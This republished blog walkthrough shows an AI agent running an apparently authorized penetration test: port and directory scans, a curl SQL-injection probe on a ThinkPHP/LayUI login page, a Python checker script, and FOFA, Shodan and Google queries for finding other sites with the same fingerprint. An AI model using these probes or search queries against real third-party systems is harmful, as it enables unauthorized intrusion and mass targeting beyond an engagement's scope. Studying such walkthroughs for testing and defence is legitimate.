Information Security 6 min read

How an AI Agent Automates Penetration Testing: A Hands‑On Walkthrough

This article details a step‑by‑step penetration test where an AI Agent on Kali Linux, invoked via the OpenClaw framework, automatically performs environment checks, deep scanning, vulnerability discovery, bulk fingerprint searching, and report generation, highlighting both its efficiencies and remaining manual decision points.

Black & White Path

Mar 25, 2026

How an AI Agent Automates Penetration Testing: A Hands‑On Walkthrough

Scenario

Goal: authorized penetration test. Tool: AI Agent deployed on Kali Linux and invoked through the OpenClaw framework.

Phase 1 – Environment preparation

Tool inventory

Nmap 7.95 – present

Curl 8.17.0 – present

WhatWeb 0.6.3 – present

Nikto – installed

Python 3.13.9 – present

Gobuster 3.8 – present

Dirb – installed

Phase 2 – Deep scan

Port scan

Nmap discovered over 80 open ports. Notable services and associated risks:

FTP (21) – plaintext transfer

Telnet (23) – plaintext login

SMB (139/445) – file sharing exposure

MySQL (3306) – database exposure

RDP (3389) – remote desktop access

VNC (5900) – remote control

Directory brute‑force

Gobuster identified several sensitive paths:

/setting – configuration page (high risk)

/database – database entry point (high risk)

/config – configuration files (high risk)

/login – login page (medium risk)

/reg – registration page (medium risk)

CMS fingerprint

CMS: LayUI 2.0.7 + ThinkPHP
Site fingerprint: form token __token__

Phase 3 – Vulnerability discovery

SQL injection test

Payload used:

curl -X POST https://target-site/manage/login/index \
  -d "username=admin'&password=123456"

The response contained SQL error markers (.line-error, .exception, .message/.code), confirming that the username parameter is vulnerable to SQL injection.

Vulnerability list

SQL Injection – /manage/login/index – high severity

Information Disclosure – /manage/setting – medium severity

Phase 4 – Bulk search

Technical fingerprints for searching

LayUI version string: layui.js?v=2.0.7 Unique path: /static/layuiadmin/ Form token: __token__ Framework clue: ThinkPHP redirect hint

Search queries

FOFA (recommended):

body="/static/layuiadmin/layui/layui.js?v=2.0.7"
body="__token__" && body="layuiadmin" && title="登录"

Shodan:

http.component:"LayUI"
title:"登录" http.html:"__token__"

Google:

"static/layuiadmin/layui/layui.js" "v=2.0.7"

Phase 5 – Report generation

Core validation script

#!/usr/bin/env python3
import requests

def check_sqli(target):
    url = f"{target}/manage/login/index"
    payload = "username=admin'&password=123456&token=test"
    response = requests.post(url, data=payload, timeout=10, verify=False)
    sql_errors = ["line-error", "exception", "SQL syntax", "系统发生错误"]
    for error in sql_errors:
        if error in response.text:
            print(f"[VULN] {url} - 存在SQL注入")
            return True
    print(f"[SAFE] {url} - 未发现注入")
    return False

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.

Python AI Automation Security penetration testing OpenClaw

Written by

Black & White Path

We are the beacon of the cyber world, a stepping stone on the road to security.

0 followers

Reader feedback

How this landed with the community

Rate this article

Was this worth your time?

Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.